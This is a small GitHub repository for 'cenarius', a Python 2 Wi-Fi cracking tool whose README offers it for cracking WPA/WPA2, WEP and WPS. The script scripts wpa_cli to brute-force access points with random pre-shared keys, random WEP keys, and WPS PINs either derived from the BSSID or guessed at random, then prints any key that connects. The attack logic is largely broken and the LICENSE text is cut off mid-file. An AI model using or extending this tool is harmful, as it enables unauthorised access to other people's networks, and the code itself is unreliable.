├── .gitignore
├── LICENSE
├── README.md
└── cenarius.py
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 |
5 | # C extensions
6 | *.so
7 |
8 | # Distribution / packaging
9 | .Python
10 | env/
11 | build/
12 | develop-eggs/
13 | dist/
14 | downloads/
15 | eggs/
16 | .eggs/
17 | lib/
18 | lib64/
19 | parts/
20 | sdist/
21 | var/
22 | *.egg-info/
23 | .installed.cfg
24 | *.egg
25 |
26 | # PyInstaller
27 | # Usually these files are written by a python script from a template
28 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
29 | *.manifest
30 | *.spec
31 |
32 | # Installer logs
33 | pip-log.txt
34 | pip-delete-this-directory.txt
35 |
36 | # Unit test / coverage reports
37 | htmlcov/
38 | .tox/
39 | .coverage
40 | .coverage.*
41 | .cache
42 | nosetests.xml
43 | coverage.xml
44 | *,cover
45 |
46 | # Translations
47 | *.mo
48 | *.pot
49 |
50 | # Django stuff:
51 | *.log
52 |
53 | # Sphinx documentation
54 | docs/_build/
55 |
56 | # PyBuilder
57 | target/
58 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 2, June 1991
3 |
4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
2 | # cenarius
3 | ======
4 | cenarius tool for crack
5 | wpa wpa2 wep and wps pin supported.
6 | and hide network too
7 |
8 | But don,t write the ussid if the AP is hide .
9 |
10 | _1st Write iface ._
11 |
12 | _2nd Write Mac address ._
13 |
14 | _3rd Write Security ex: between '[]' Not All ._
15 |
16 | _4th Write ussid for AP if not hidden ._
17 |
18 | __you will get file to scan APs , file recording all what you do and file of wpa_supplicant .__
19 |
20 |
21 | # what is Different
22 | -------------------
23 | _You do not need to worldlist ._
24 |
25 | _not need complex crack tools ._
26 |
27 | _just generate *(psk generate) ._
28 |
29 | _8 pass in 1 min ._
30 |
31 | #warning
32 | _dont connect to wifi when use it ._
33 |
34 | _dont try too much wifi in the same time just and only one ._
35 |
36 | _securty is under [] ex: [WPA2-PSK-CCMP+TKIP] , [WPS] , [WEP] not all [WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS] and ever never for ever write [ESS] not supported yet ._
37 |
38 |
39 | #idea
40 | from ["wifite"](https://github.com/derv82/wifite) tool .
41 | # What you need to open it
42 | _cenarius for Linux only._
43 | * [__Python 2.7.x__](http://python.org/getit/).
44 | * [xdotool](https://github.com/jordansissel/xdotool) .
45 | * [wpasupplicant](https://w1.fi/wpa_supplicant/) especially [wpa_cli](linux.die.net/man/8/wpa_cli) .
46 | * [PBKDF2](https://pypi.python.org/pypi/pbkdf2) for python .
47 |
48 | # have fun for cracking ^_^
49 | Adel Ashraf
50 |
--------------------------------------------------------------------------------
/cenarius.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # -*- coding: utf-8 -*-
4 |
5 | """
6 | the tool mack by adel ashraf
7 | I get idea from wifite.py
8 |
9 |
10 | you can change it if you know python :D
11 | but dont remove my name :P
12 |
13 | Thanks to everyone that contributed to this project.
14 | ***what to do :
15 | open the tool as root and make sure you open it in the same location
16 | ex :
17 | root@pc:~/ cd Desktop && python name.py
18 | #as the file in Desktop
19 | 1st before open
20 | get xdotool
21 | get wpa_cli
22 | get pbkdf2 in py
23 | and all import in the tool
24 | """
25 | #############
26 | # LIBRARIES #
27 | #############
28 | import subprocess
29 | from subprocess import Popen, call, PIPE
30 | from pbkdf2 import PBKDF2
31 | import os
32 | import sys
33 | import socket
34 | import struct
35 | import fcntl
36 | import errno
37 | import time
38 | import random
39 | # Console colors
40 | W = '\033[0m' # white (normal)
41 | R = '\033[31m' # red
42 | G = '\033[32m' # green
43 | O = '\033[33m' # orange
44 | B = '\033[34m' # blue
45 | P = '\033[35m' # purple
46 | C = '\033[36m' # cyan
47 | GR = '\033[37m' # gray
48 | # iface name
49 | os.system('clear')
50 | print G+'What is your iface name '+W
51 | iface = raw_input(G+'[*]'+W+'Write the ifname : ')
52 | iff = '-i' +iface
53 | #from wifite :P
54 | print G +" .;' `;, "
55 | print G +" .;' ,;' `;, `;, "
56 | print G +".;' ,;' ,;' `;, `;, `;, "
57 | print G +":: :: : "+O+" (|) "+G+" : :: :: "
58 | print G +"':. ':. ':."+O+" | "+G+",:' ,:' ,:' "
59 | print G +" ':. ':. "+O+" | "+G+" ,:' ,:' "
60 | print G +" ':. "+O+" | "+G+" ,:' "
61 | print G +" "+O+" ___|___"+G
62 | print W
63 | print G + " Wellcome to "+sys.argv[0]+ " tool " + W
64 | time.sleep(3)
65 | # xdotool
66 | os.system('xdotool windowsize $(xdotool getactivewindow) 100% 90%')
67 | remove_network = 'wpa_cli %s remove_network 0 > /dev/null' %(iff)
68 |
69 | subprocess.call(remove_network, shell=True)
70 | add_network ='wpa_cli %s add_network > /dev/null' %(iff)
71 | os.system(add_network)
72 | os.system('clear > /dev/null')
73 | #just see the link
74 | def mon_mac(mon_iface):
75 | '''
76 | http://stackoverflow.com/questions/159137/getting-mac-address
77 | '''
78 | s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
79 | info = fcntl.ioctl(s1.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
80 | mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
81 | print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
82 | return mac
83 | # from wifite
84 | if os.getuid() != 0:
85 | print R + ' [!]' + O + ' Error:' + G + "Tool" + O + ' must be run as ' + R + 'root' + W
86 | print R + ' [!]' + O + ' login as root (' + W + 'su and the pass' + O + ') or try ' + W + 'sudo python '+sys.argv[0] + W
87 | exit(1)
88 |
89 | if not os.uname()[0].startswith("Linux") and not 'Darwin' in os.uname()[0]:# OS
90 | print O + ' [!]' + R + ' WARNING:' + G + ' Tool' + W + ' must be run on ' + O + 'linux' + W
91 | exit(1)
92 |
93 | fil = open('a.conf', 'w')
94 | fil.write('')
95 | fil.close()
96 | fil = open('a.log', 'w')
97 | fil.write(str(os.getuid())+'\n')
98 |
99 |
100 | print G+"[#]"+W+"Your scan will start now :D "
101 | time.sleep(1)
102 | if '1' =="1" :
103 | os.system('clear > /dev/null')
104 | scan = 'wpa_cli %s scan > /dev/null' %(iff)
105 | subprocess.call(scan, shell=True)
106 | time.sleep(3)
107 | scan_results = 'wpa_cli %s scan_results' %(iff)
108 | pro= subprocess.Popen(scan_results, stdout=subprocess.PIPE, stderr=None, shell=True)
109 | o= pro.communicate()
110 | pro = 'off'
111 | fil.write(str(o)+'\n')
112 | a =o[0]
113 | if o[0] =='' :
114 | print R + '[!] ' + 'Error in %s' %(str(iface)) +W
115 | exit()
116 | a = a.replace('/' , '')
117 | a = a.replace('\n' ,' ')
118 | a = a.split()
119 | a1 = open('scan.c' ,'w')
120 | a1.write(o[0])
121 | a1.close()
122 | a1 = open('scan.c' ,'r')
123 | a2 = a1.readline()
124 | if a2 == "" :
125 | print a2
126 | print '[' + G +'*' +W +'] ' + "scan finish "
127 | elif a[0:6] =='Failed' :
128 | print R + '[!] ' + 'Error in %s' %(str(iface)) +W
129 | elif a2 == "bssid / frequency / signal level / flags / ssid\n" :
130 | mon_mac(iface)
131 | print G + a[0]+W+" | "+ a[1] +" | "+R+ a[2]+W+" | "+ a[3] +" | "+ G +a[5] +W
132 | a2 = a1.readline()
133 | print a2
134 | a3 =len(a2)
135 | a = 0
136 | while a== 0 :
137 | if a3 == 0 :
138 | print '[' + G +'*' +W +'] ' + "scan finish "
139 | a +=1
140 | elif a2[0:6] =='Failed' :
141 | print R + '[!] ' + 'Error in %s' %(str(iface)) +W
142 | else :
143 | a2 = a1.readline()
144 | print a2
145 | a3 =len(a2)
146 | else :
147 | print R + '[!] ' + 'Error in %s' %(str(iface)) +W
148 | #the most important info :D
149 |
150 |
151 | a4 = raw_input("write the bssid you want choose : ")#mac
152 | a5 = raw_input("write the level of the net work : ")#one level not all
153 | a6 = raw_input("write the ussid of the net work : ")#ssid of wifi
154 | a5 = a5.replace('-preauth' , '')
155 | a5 = a5.replace('-PIN' , '')
156 |
157 | if a5 =="[WPA2-PSK-CCMP][ESS]" :
158 | router = "HG532n"
159 | elif a5 == "[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP-preauth][ESS]" :
160 | router = "netgear or 3com "
161 | elif a5 == "[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]" :
162 | router = "AP" #normal
163 | else :
164 | router = "none"
165 |
166 |
167 | if len(a4) < 17 :
168 | print R + "[!] " +W + "ERRor Write the true bssid "
169 | exit()
170 | elif len(a4) > 17 :
171 | print R + "[!] " +W + "ERRor Write the true bssid "
172 | exit()
173 | elif a4[2] and a4[5] and a4[8] and a4[11] and a4[14] == ':' :
174 | os.system('clear > /dev/null')
175 | else :
176 | print R + "[!] " +W + "ERRor Write the true bssid "
177 | exit()
178 |
179 |
180 | if '1' == '1' :
181 | if a5[1:18] =="WPA-PSK-CCMP+TKIP" :
182 | WPA = "WPA-PSK"
183 | TKIP = "TKIP"
184 | command1 = 'wpa_cli %s set_network 0 key_mgmt WPA-PSK > /dev/null' %(iff)
185 | command2 = 'wpa_cli %s set_network 0 group CCMP > /dev/null' %(iff)
186 | command3 = 'wpa_cli %s set_network 0 group TKIP > /dev/null' %(iff)
187 | command4 = 'wpa_cli %s set_network 0 pairwise TKIP > /dev/null' %(iff)
188 | elif a5[1:19] =="WPA2-PSK-CCMP+TKIP" :
189 | WPA = "WPA-PSK"
190 | TKIP = "TKIP"
191 | command1 = 'wpa_cli %s set_network 0 key_mgmt WPA-PSK > /dev/null' %(iff)
192 | command2 = 'wpa_cli %s set_network 0 group CCMP > /dev/null' %(iff)
193 | command3 = 'wpa_cli %s set_network 0 group TKIP > /dev/null' %(iff)
194 | command4 = 'wpa_cli %s set_network 0 pairwise TKIP > /dev/null' %(iff)
195 | elif a5[1:13] == 'WPA-PSK-TKIP' :
196 | command1 = 'wpa_cli %s set_network 0 key_mgmt WPA-PSK > /dev/null' %(iff)
197 | command2 = 'wpa_cli %s set_network 0 group TKIP > /dev/null' %(iff)
198 | command3 = 'wpa_cli %s set_network 0 group TKIP > /dev/null' %(iff)
199 | command4 = 'wpa_cli %s set_network 0 pairwise TKIP > /dev/null' %(iff)
200 | elif a5[1:14] == 'WPA2-PSK-TKIP' :
201 | command1 = 'wpa_cli %s set_network 0 key_mgmt WPA-PSK > /dev/null' %(iff)
202 | command2 = 'wpa_cli %s set_network 0 group TKIP > /dev/null' %(iff)
203 | command3 = 'wpa_cli %s set_network 0 group TKIP > /dev/null' %(iff)
204 | command4 = 'wpa_cli %s set_network 0 pairwise TKIP > /dev/null' %(iff)
205 | elif a5[1:14] == "WPA2-PSK-CCMP" :
206 | WPA ="WPA-PSK"
207 | CCMP = "CCMP"
208 | command1 = 'wpa_cli %s set_network 0 key_mgmt WPA-PSK > /dev/null' %(iff)
209 | command2 = 'wpa_cli %s set_network 0 group CCMP > /dev/null' %(iff)
210 | command3 = 'wpa_cli %s set_network 0 group CCMP > /dev/null' %(iff)
211 | command4 = 'wpa_cli %s set_network 0 pairwise CCMP > /dev/null' %(iff)
212 | elif a5[1:13] == 'WPA-PSK-CCMP' :
213 | command1 = 'wpa_cli %s set_network 0 key_mgmt WPA-PSK > /dev/null' %(iff)
214 | command2 = 'wpa_cli %s set_network 0 group CCMP > /dev/null' %(iff)
215 | command3 = 'wpa_cli %s set_network 0 group CCMP > /dev/null' %(iff)
216 | command4 = 'wpa_cli %s set_network 0 pairwise CCMP > /dev/null' %(iff)
217 | elif a5[1:4] =="WEP" :
218 | add_network = 'wpa_cli %s add_network > /dev/null' %(iff)
219 | subprocess.call(add_network, shell=True)
220 | def wep() :
221 | WEP="WEP"
222 | shell = 'ABCDEF1234567890'
223 | def id_generator(size=10, chars=shell):
224 | return ''.join(random.choice(chars) for _ in range(size))
225 | c = ("""wpa_cli %s set_network 0 ssid '"%s"' > /dev/null""") %(iff, a6)
226 | c1 = ('wpa_cli %s bssid 0 %s > /dev/null') %(iff, a4)
227 |
228 | subprocess.call('clear > /dev/null', shell=True)
229 | subprocess.call(c, shell=True)
230 | subprocess.call(c1, shell=True)
231 | while 1 :
232 | time.sleep(1)
233 | status = 'wpa_cli %s status' %(iff)
234 | pro= subprocess.Popen(status, stdout=subprocess.PIPE, stderr=None, shell=True)
235 | o= pro.communicate()
236 | fil.write(str(o)+'\n')
237 | a = o[0]
238 | if a[120:140] == 'wpa_state=ASSOCIATED' :
239 | print G + '[*] ' + W + P+'Connecting complete :D' +W
240 | print c2[30:41]
241 | exit()
242 | elif a[120:139] == 'wpa_state=COMPLETE' :
243 | print G + '[*] ' + W + P+'Connecting complete :D' +W
244 | print c2[30:41]
245 | exit()
246 | c2 = ('wpa_cli %s set_network 0 wep_key0 %s > /dev/null') %(iff, id_generator())
247 | fil.write(c2+ '\n')
248 | subprocess.call(c2)
249 | enable_network = 'wpa_cli %s enable_network 0 > /dev/null' %(iff)
250 | select_network = 'wpa_cli %s select_network 0 > /dev/null' %(iff)
251 | subprocess.call(enable_network, shell=True)
252 | subprocess.call(select_network, shell=True)
253 | time.sleep(1.4)
254 | return
255 | elif a5[1:4] == 'WPS' :
256 | def wps() :
257 | remove_network = 'wpa_cli %s remove_network 0 > /dev/null' %(iff)
258 | subprocess.call(remove_network, shell=True)
259 | bbsid = a4[9]+a4[10]+a4[12]+a4[13]+a4[15]+a4[16]
260 | pine = 123456
261 | def wps_pin(pine):
262 | accum = 0
263 | while(pine):
264 | accum += 3 * (pine % 10)
265 | pine /= 10
266 | accum += pine % 10
267 | pine /= 10
268 | return (10 - accum % 10) % 10
269 |
270 | try:
271 | if (len(bbsid) == 6):
272 | pin = int(bbsid , 16) % 10000000
273 | pin1 = "%07d%d" %(pin, wps_pin(pin))
274 | time.sleep(6)
275 | print G +"[+]"+W + "try WPS pin : %07d%d" % (pin, wps_pin(pin))
276 | else:
277 | print G + '[*] ' + W + 'Crack finish '
278 | except Exception:
279 | print G + '[*] ' + W + 'Crack finish '
280 |
281 | code = 'wpa_cli wps_reg %s %s' %(a4, pin1)
282 | fil1 = open('wps.sh' , 'w')
283 | fil1.write('#sh\n' + code + ' > /dev/null')
284 | fil1.close()
285 | subprocess.call('sh wps.sh', shell=True)
286 | time.sleep(2)
287 | remove_network = 'wpa_cli %s remove_network 0 > /dev/null' %(iff)
288 | subprocess.call(remove_network, shell=True)
289 | time.sleep(0.5)
290 | subprocess.call('sh wps.sh', shell=True)
291 | time.sleep(15)
292 | if 1==1 :
293 | status = 'wpa_cli %s status' %(iff)
294 | pro= subprocess.Popen(status, stdout=subprocess.PIPE, stderr=None, shell=True)
295 | o= pro.communicate()
296 | fil.write(str(o)+'\n')
297 | a = o[0]
298 | if a[120:140] == 'wpa_state=ASSOCIATED' :
299 | print G + '[*] ' + W + P+'Connecting complete :D' +W
300 | print 'pin ' + pin1
301 | exit()
302 | elif a[120:139] == 'wpa_state=COMPLETED' :
303 | print G + '[*] ' + W + P+'Connecting complete :D' +W
304 | print 'pin ' + pin1
305 | exit()
306 | else :
307 | def id_generato(size=1, chars='316425789'):
308 | return ''.join(random.choice(chars) for _ in range(size))
309 |
310 |
311 | def id_generator(size=2, chars='3164205789'):
312 | return ''.join(random.choice(chars) for _ in range(size))
313 |
314 |
315 | def id_generatos(size=1, chars='3164205789'):
316 | return ''.join(random.choice(chars) for _ in range(size))
317 |
318 |
319 | while 1 :
320 | pino = id_generato() + id_generatos() + id_generator() +id_generator() +id_generator()
321 | print G +"[+]"+W + "try WPS pin : %s" %(pino)
322 | code = 'wpa_cli wps_reg %s %s' %(a4, pino)
323 | fil1 = open('wps.sh' , 'w')
324 | fil1.write('#sh\n' + code + ' > /dev/null')
325 | fil1.close()
326 | subprocess.call('sh wps.sh', shell=True)
327 | time.sleep(2)
328 | remove_network = 'wpa_cli %s remove_network 0 > /dev/null' %(iff)
329 | subprocess.call(remove_network, shell=True)
330 | time.sleep(0.5)
331 | subprocess.call('sh wps.sh', shell=True)
332 | time.sleep(12)
333 | if 1==1 :
334 | status = 'wpa_cli %s status' %(iff)
335 | pro= subprocess.Popen(status, stdout=subprocess.PIPE, stderr=None, shell=True)
336 | o= pro.communicate()
337 | fil.write(str(o)+'\n')
338 | a = o[0]
339 | if a[120:140] == 'wpa_state=ASSOCIATED' :
340 | print G + '[*] ' + W + P+'Connecting complete :D' +W
341 | print 'pin ' + pino
342 | exit()
343 | elif a[120:139] == 'wpa_state=COMPLETED' :
344 | print G + '[*] ' + W + P+'Connecting complete :D' +W
345 | print 'pin ' + pino
346 | exit()
347 |
348 |
349 | else :
350 | router = "none"
351 | print R + '[!] ' +W + P +"Securty level not suported " + W
352 | exit()
353 |
354 |
355 | def wpa() :
356 | # 8 pass in min
357 | shell = '1a2b3c0d9e8f4756'
358 | def id_generator(size=64, chars=shell):
359 | return ''.join(random.choice(chars) for _ in range(size))
360 | try :
361 | pro= subprocess.Popen('wpa_cli %s scan' %(iff), stdout=subprocess.PIPE, stderr=None, shell=True)
362 | aa = '#sh'
363 | b = """wpa_cli %s set_network 0 ssid '"%s"' > /dev/null""" %(iff, a6)
364 | c = 'wpa_cli %s bssid 0 %s > /dev/null' %(iff, a4)
365 | d = command1
366 | e = command3
367 | f = command4
368 | g = 'wpa_cli %s set_network 0 psk %s > /dev/null' %(iff, id_generator())
369 | print G +'[*] try' + W + g[29:100]
370 | fil.write(g + '\n')
371 | h = 'wpa_cli %s select_network 0 > /dev/null' %(iff)
372 | z = '''
373 |
374 | '''
375 | crack = (aa + z + b + z + c + z + d + z + e + z + e + z + f + z + g + z + h + z )
376 | fil2 = open('wpa.sh', 'w')
377 | fil2.write(crack)
378 | fil2.close
379 | time.sleep(0.5)
380 | os.system('sh wpa.sh')
381 | time.sleep(4)
382 | status = 'wpa_cli %s status' %(iff)
383 | time.sleep(0.2)
384 | pro= subprocess.Popen(status, stdout=subprocess.PIPE, stderr=None, shell=True)
385 | o= pro.communicate()
386 | fil.write(str(o)+'\n')
387 | a1 = o[0]
388 | if a1[120:139] == 'wpa_state=COMPLETED' :
389 | print G + ' Connect ' + W
390 | print g[29:100]
391 | exit()
392 |
393 | g = 'wpa_cli %s set_network 0 psk %s > /dev/null' %(iff, id_generator())
394 | print G +'[*] try' + W + g[29:100]
395 | fil.write(g + '\n')
396 | crack = (aa + z + b + z + c + z + d + z + e + z + e + z + f + z + g + z + h + z )
397 | fil2 = open('wpa.sh', 'w')
398 | fil2.write(crack)
399 | fil2.close
400 | time.sleep(0.5)
401 | os.system('sh wpa.sh')
402 | time.sleep(4)
403 | time.sleep(0.5)
404 | pro= subprocess.Popen(status, stdout=subprocess.PIPE, stderr=None, shell=True)
405 | o= pro.communicate()
406 | fil.write(str(o)+'\n')
407 | a1 = o[0]
408 | if a1[120:139] == 'wpa_state=COMPLETED' :
409 | print G + ' Connect complite' + W
410 | print g[29:100]
411 | exit()
412 |
413 | except KeyboardInterrupt :
414 | print P + "you presd ctrl+c " + W
415 | remove = 'wpa_cli %s remove_network 0 > /dev/null' %(iff)
416 | os.system(remove)
417 | exit()
418 |
419 | return
420 |
421 | def test(tast) :
422 | try :
423 | pro= subprocess.Popen('wpa_cli %s scan_results' %(iff), stdout=subprocess.PIPE, stderr=None, shell=True)
424 | o1= pro.communicate()
425 | ao = o1[0]
426 | if a4 not in o1 :
427 | time.sleep(2.1)
428 | time.sleep(4)
429 | pro= subprocess.Popen('wpa_cli %s scan_results' %(iff), stdout=subprocess.PIPE, stderr=None, shell=True)
430 | o1= pro.communicate()
431 | ao = o1[0]
432 | if a4 not in ao :
433 | print R + 'error AP not found '+W
434 | print '['+R+'!'+W+']'+'may it close ,reset or far a way'
435 | exit()
436 | else :
437 | tast
438 | else :
439 | tast
440 | except KeyboardInterrupt :
441 | RUN_CONFIG = tast
442 | print P + "you presd ctrl+c " + W
443 | remove = 'wpa_cli %s remove_network 0 > /dev/null' %(iff)
444 | os.system(remove)
445 | RUN_CONFIG.exit_gracefully(0)
446 | exit()
447 | return
448 |
449 | #tool start
450 |
451 |
452 | if '1' == '1' :
453 | os.system('clear')
454 | print G +"[*] " + W + "Your crack will start"
455 | if a5[1:18] =="WPA-PSK-CCMP+TKIP" :
456 | while 1 :
457 |
458 | test(wpa())
459 | elif a5[1:19] =="WPA2-PSK-CCMP+TKIP" :
460 | while 1 :
461 |
462 | test(wpa())
463 | elif a5[1:14] == "WPA2-PSK-CCMP" :
464 | while 1 :
465 |
466 | test(wpa())
467 | elif a5[1:13] == 'WPA-PSK-CCMP' :
468 | while 1 :
469 |
470 | test(wpa())
471 | elif a5[1:13] == 'WPA-PSK-TKIP' :
472 | while 1 :
473 |
474 | test(wpa())
475 | elif a5[1:14] == 'WPA2-PSK-TKIP' :
476 | while 1 :
477 |
478 | test(wpa())
479 | elif a5[1:4] =="WEP" :
480 | test(wep())
481 | elif a5[1:4] == 'WPS' :
482 | test(wps())
483 | else :
484 | print R+ '[*] ' + W +'Error level net work has not support \n'
485 |
486 |
487 |
488 |
489 |
--------------------------------------------------------------------------------